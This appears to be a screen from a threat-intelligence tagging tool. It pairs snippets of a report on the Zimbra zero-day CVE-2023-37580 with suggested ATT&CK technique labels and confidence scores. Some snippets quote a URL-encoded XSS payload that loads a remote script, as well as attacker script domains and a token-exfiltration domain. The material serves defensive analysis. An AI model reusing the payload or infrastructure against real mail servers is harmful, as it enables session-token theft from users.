". the exploit was used to steal the zimbra authentication token. the token was exfiltrated to ntcpk [. ] org. conclusion the discovery of at least four campaigns exploiting cve - 2023 - 37580, three campaigns after the bug first became public, demonstrates the importance of organ…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
T1190 Exploit Public-Facing Application
86%
"##thub on july 5, 2023 and published an initial advisory with remediation guidance on july 13, 2023. they patched the vulnerability as cve - 2023 - 37580 on july 25, 2023. tag observed three threat groups exploiting the vulnerability prior to the release of the official patch, in…"
T1566.002 Spearphishing Link
81%
"https : / / mail. redacted [. ] com / m / momovetost = acg % 22 % 2f % 3e % 3cscript % 20src % 3d % 22https % 3a % 2f % 2fobsorth % 2eopwtjnpoc % 2eml % 2fpqymscxwybwjpios % 2ejs % 22 % 3e % 3c % 2fscript % 3e % 2f % 2f which decodes to : https : / / mail. redacted [. ] com / m /…"
T1190 Exploit Public-Facing Application
55%
"##cube mail servers just this past month. the regular exploitation of xss vulnerabilities in mail servers also shows a need for further code auditing of these applications, especially for xss vulnerabilities. we ’ d like to acknowledge zimbra for their response and patching of th…"
T1190 Exploit Public-Facing Application
48%
"zimbra 0 - day used to target international government organizations zimbra 0 - day used to target international government organizations in june 2023, google ’ s threat analysis group ( tag ) discovered an in - the - wild 0 - day exploit targeting zimbra collaboration, an email …"
T1190 Exploit Public-Facing Application
48%
"the attackers sent emails containing exploit urls to their targets. if a target clicked the link during a logged - in zimbra session, the url loaded the same framework that volexity documented in february 2022. this framework uses the xss to steal users ’ mail data, such as email…"
T1566.002 Spearphishing Link
47%
"an apt group known to exploit xss in zimbra and roundcube. the vulnerability was used to load scripts at : https : / / applicationdevsoc [. ] com / zimbramalwaredefender / zimbradefender. js https : / / applicationdevsoc [. ] com / tndgt / auth. js campaign 3 : exploit used for c…"